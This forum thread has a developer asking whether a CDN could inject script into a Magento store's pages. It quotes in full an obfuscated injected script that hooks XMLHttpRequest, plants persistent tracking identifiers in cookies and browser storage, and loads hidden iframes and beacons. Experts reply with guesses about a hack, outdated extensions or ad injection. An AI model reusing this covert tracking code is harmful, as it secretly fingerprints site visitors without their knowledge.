Can/do CDN's inject code into the html?

lthames
lthames used Ask the Experts™
on
I have an odd question . . . I'm just trying to theorize something.

I had a client set up ONE of the stores of his Magento installation using some type of content delivery network.  I'm not sure of the provider, but the host he is pointing to is hisdomain.com.adn.fblcloud.net

Yesterday, a few days after he set it up,  his site slowed to a crawl ONLY for the one store.  His other 2 stores were working fine.  They share all code and all products, just different themes.

Upon researching we found the following code was inserted into every page of the site.  However after searching with grep and also downloading the entire app and searching for changed files, we couldn't find anything with code that looked familiar.  I also checked all of the CMS pages, blocks, category design and layout settings, etc.

This morning it is magically fixed.  And my tech said it shouldn't have been the CDN . . . but he scanned our server and found nothing (he's my security/pci  expert so hopefully he wouldn't miss something).

I'm trying to figure out if the CDN COULD be injecting script code into html as it is delivered . . and if so, is this a problem to be concerned with in the future?

Here is the code -
<body class=" catalog-category-view categorypath-headsets-bluetooth-html category-bluetooth"><div style='display:none' id='sbbhscc'></div><script type="text/javascript">sbbvscc=''; sbbgscc='; function genPid() {return String.fromCharCode(73)+String.fromCharCode(69); }';</script><div id='sbbfrcc' style='position: absolute; top: -10px; left: 30px; font-size:1px'></div><script type="text/javascript">(function(XHR) { var open = XHR.prototype.open; var send = XHR.prototype.send; var parser = document.createElement('a'); XHR.prototype.open = function(method, url, async, user, pass) { parser.href = url; if (parser.host == '') parser.href = parser.href; this.ajax_hostname = parser.hostname; open.call(this, method, url, async, user, pass); }; XHR.prototype.send = function(data) { if (location.hostname == this.ajax_hostname) this.setRequestHeader("X-MOD-SBB-CTYPE", "xhr"); send.call(this, data); } })(XMLHttpRequest); function sbbgc( check_name ) { var start=document.cookie.indexOf(check_name+"="); var oVal=''; var len=start+check_name.length+1; if((!start)&&(document.cookie.substring(0,check_name.length)!=check_name)){ oVal=''; } else if(start==-1){ oVal=''; } else { var end=document.cookie.indexOf(';',len); if(end==-1)end=document.cookie.length; var oVal=document.cookie.substring(len,end); }; return oVal; } function addmg(inm,ext){ var primgobj = document.createElement ('IMG'); primgobj.src = window.location.protocol + "//" + window.location.hostname + (window.location.port && window.location.port!=80 ? ':' + window.location.port: '')+"/sbbi/?sbbpg="+inm+(ext?"&"+ext:""); var sbbDiv = document.getElementById('sbbfrcc'); sbbDiv.appendChild (primgobj); }; function addprid(prid){ var oldVal=sbbgc("PRLST"); if((oldVal.indexOf(prid)==-1)&&(oldVal.split('/').length<5)){ if(oldVal!='')oldVal+='/'; document.cookie='PRLST='+oldVal+escape(prid)+'; path=/; domain=.nationalwireless.com'; } } var sbbeccf = function () { this.sp3 = "jass"; this.sf1 = function (vd) { return sf2(vd)+32; }; var sf2 = function (avd) { return avd*12; }; this.sf4 = function (yavd) { return yavd+2; }; var strrp = function (str, key, value) { if (str.indexOf('&' + key + '=') > -1 || str.indexOf(key + '=') == 0) { var idx = str.indexOf('&' + key + '='); if (idx == -1) idx = str.indexOf(key + '='); var end = str.indexOf('&', idx + 1); var newstr; if (end != -1) newstr = str.substr(0, idx) + str.substr(end + (idx ? 0 : 1)) + '&' + key + '=' + value; else newstr = str.substr(0, idx) + '&' + key + '=' + value; return newstr; } else return str + '&' + key + '=' + value; }; var strgt = function(name, text) { if (typeof text != 'string') return ""; var nameEQ = name + "="; var ca = text.split(/[;&]/); for (var i = 0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0) == ' ') c = c.substring(1, c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length); } return ""; }; this.sfecud = { f:function(name, value) { var fv=""; try { var elm = document.getElementById('sbbfrcc'); elm.style.behavior = "url(#default#userData)"; if (typeof(value) != "undefined") { elm.setAttribute(name, value); elm.save(name); } else { elm.load(name); fv=elm.getAttribute(name); } } catch(e) { } return fv; }, name:"sbbrf" }; this.sfecgs = { sbbgh:function() { var domain = document.location.host; if (domain.indexOf('www.') == 0) domain = domain.replace('www.', ''); return domain; }, f:function(name, value) { var fv=""; if (window.globalStorage) { var host = this.sbbgh(); try { if (typeof(value) != "undefined") globalStorage[host][name] = value; else { fv=globalStorage[host][name]; if (typeof (fv.toString)!="undefined") fv=fv.toString(); } } catch(e) { } } return fv; }, name:"sbbrf" }; this.sfecls = { f:function(name, value) { var fv=""; try { if (window.localStorage) { if (typeof(value) != "undefined") localStorage.setItem(name, value); else { fv=localStorage.getItem(name); if (typeof (fv.toString)!="undefined") fv=fv.toString(); } } } catch (e) { } return fv; }, name:"sbbrf" }; this.sbbcv = function (invl) { try { var invalArr = invl.split("-"); if (invalArr.length>1) { if (invalArr[0]=="A"||invalArr[0]=="D") { invl=invalArr[1]; } else invl=""; } if (invl==null||typeof(invl)=="undefined"||invl=="falseImgUT"||invl=="undefined"||invl=="null"||invl!=encodeURI(invl)) invl=""; if (typeof(invl).toLowerCase()=="string") if (invl.length>20) if (invl.substr(0,2)!="h4") invl=""; } catch (ex) { invl=""; } return invl; }; this.sbbsv = function (fv) { for (var elm in this) { if (this[elm].name=="sbbrf") { this[elm].f("altutgv2",fv); } } document.cookie = "UTGv2="+fv+'; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/; domain=.nationalwireless.com'; }; this.sbbgv = function() { var valArr=Array(); var currVal=""; for (var elm in this) { if (this[elm].name=="sbbrf") { currVal = this[elm].f("altutgv2"); currVal = this.sbbcv(currVal); if (currVal!="") valArr[currVal]=(typeof(valArr[currVal])!="undefined"?valArr[currVal]+1:1); } } var lb=0; var fv=""; for (var val in valArr) { if (valArr[val]>lb) { fv = val; lb=valArr[val] } } if (fv=="") fv=sbbgc("UTGv2"); fv = this.sbbcv(fv); if (fv!="") this.sbbsv (fv); else this.sbbsv("A-h47ad0fb8bb49ce11021b482c7aec048d173-91a2a4a78a51a121a40a77a9a86a77a4a22a83a74a0a5a5a"); return fv; }; }; function m2vr(m1,m2) { var i=0; var rc=""; var est = "ghijklmnopqrstuvwyz"; var rnum; var rpl; var charm1 = m1.charAt(i); var charm2 = m2.charAt(i); while (charm1!=""||charm2!="") { rnum = Math.floor(Math.random() * est.length); rpl = est.substring(rnum,rnum+1); rc +=(charm1==""?rpl:charm1)+(charm2==""?rpl:charm2); i++; charm1 = m1.charAt(i); charm2 = m2.charAt(i); } return rc; } function sbbls(prid) { try { var eut = sbbgc("UTGv2"); sbbeccfi = new sbbeccf(); sbbgs=sbbeccfi.sbbgv(); if (eut!=sbbgs && sbbgs!="" && typeof(sbbfcr)=="undefined") { addmg('utMedia',"vii="+m2vr("08e1427711c978193f5319ad2f0452fc",sbbgs)); } var sbbiframeObj = document.createElement ('IFRAME'); var dfx=new Date(); sbbiframeObj.id = 'SBBCrossIframe'; sbbiframeObj.style.border='0px'; if (document.all) { sbbiframeObj.style.position='absolute'; sbbiframeObj.style.top='-1px'; sbbiframeObj.style.height='1px'; sbbiframeObj.style.width='28px'; } else { sbbiframeObj.style.height='1px'; sbbiframeObj.style.width='0px'; } sbbiframeObj.scrolling="NO"; sbbiframeObj.src = window.location.protocol + "//" + window.location.hostname + (window.location.port && window.location.port!=80 ? ':' + window.location.port: '')+'/sbbi/?sbbpg=sbbShell&gprid='+prid+''; var sbbDiv = document.getElementById('sbbfrcc'); sbbDiv.appendChild (sbbiframeObj); } catch (ex) { alert (ex.message); } } try{ y=unescape(sbbvscc.replace(/^<\!\-\-\s*|\s*\-\->$/g,'')); document.getElementById('sbbhscc').innerHTML=y; x=unescape(sbbgscc.replace(/^<\!\-\-\s*|\s*\-\->$/g,'')); } catch(e){ x='function genPid() {return "jser"; }'; } try { if (window.gprid==undefined) document.write('<'+'script type="text/javascri'+'pt">'+x+"var gprid=genPid(); addprid(gprid);  sbbfcr=true;sbbls(gprid);<"+"/script>"); } catch (e) { addprid("dwer"); } </script>

Open in new window


Thanks for any information you can give me!
Comment
Watch Question

Do more with

Expert Office
EXPERT OFFICE® is a registered trademark of EXPERTS EXCHANGE®
Expert of the Year 2014
Top Expert 2014
Commented:
Looks suspiciously like someone has hacked the site, unusual for Magento
It's unlikely the CDN was hacked but not beyond the realm of possibility.

Check your plugins are all up to date
What version of Magento are you on?

Author

Commented:
They are on 1.72 . . but if magento was hacked it wouldn't have just been the one store and it wouldn't have gone away without anyone doing anything on the 'real' server (and I am 100% sure nothing was done on the real server).

Author

Commented:
something I didn't mention.  The script created a bunch of results in google  -
https://www.google.ca/search?q=sbbi%2F%25253Fsbbpg%3DsbbShell%26gprid%3D%27%2Bprid%2B%27&oq=sbbi%2F%25253Fsbbpg%3DsbbShell%26gprid%3D%27%2Bprid%2B%27&aqs=chrome..69i57j69i58.263j0j4&client=ubuntu-browser&sourceid=chrome&espv=2&es_sm=94&ie=UTF-8#filter=0&q=/sbbi/%3Fsbbpg%3DsbbShell&start=20

Yesterday, when clicking on any of the results it went to a blank page (which you can see when looking at the cached).  Today when clicking on any of the results it goes to the real site's oops, page not found page.
Ensure you’re charging the right price for your IT

Do you wonder if your IT business is truly profitable or if you should raise your prices? Learn how to calculate your overhead burden using our free interactive tool and use it to determine the right price for your IT services. Start calculating Now!

Author

Commented:
One other 'additional' piece of information . . .  there was no folder /sbbi/ on the real server yesterday either.
Dave BaldwinFixer of Problems
Most Valuable Expert 2014
Commented:
The basic answer to your question is Yes, it is possible.  Some 'Free' hosting services put ads in the pages they deliver.  That code also looks vaguely like spam advertising code or even virus download code.
Expert of the Year 2014
Top Expert 2014

Commented:
What plugins are you using if any - did you check they were all upto date?

Author

Commented:
They use several extensions and not all are up to date.  They need to upgrade to 1.9 and updated extensions . . . but he's been putting it off.

However,  all stores use the same extensions but only the one store on CDN had the issue.  And an out of date extension surely wouldn't be a problem yesterday and not today - with no intervention.

The client hasn't questioned what happened . . . so I'm really just curious.
Expert of the Year 2014
Top Expert 2014

Commented:
What are they using the CDN for? Images, js, css ?

Author

Commented:
Their site was not hacked . . I never got an answer but within a couple of hours after I told the client to check with his consultant that set up the CDN . . . everything was back to normal.  

My inquiries to find out what it was were not answered :(

Do more with

Expert Office
Submit tech questions to Ask the Experts™ at any time to receive solutions, advice, and new ideas from leading industry professionals.

Start 7-Day Free Trial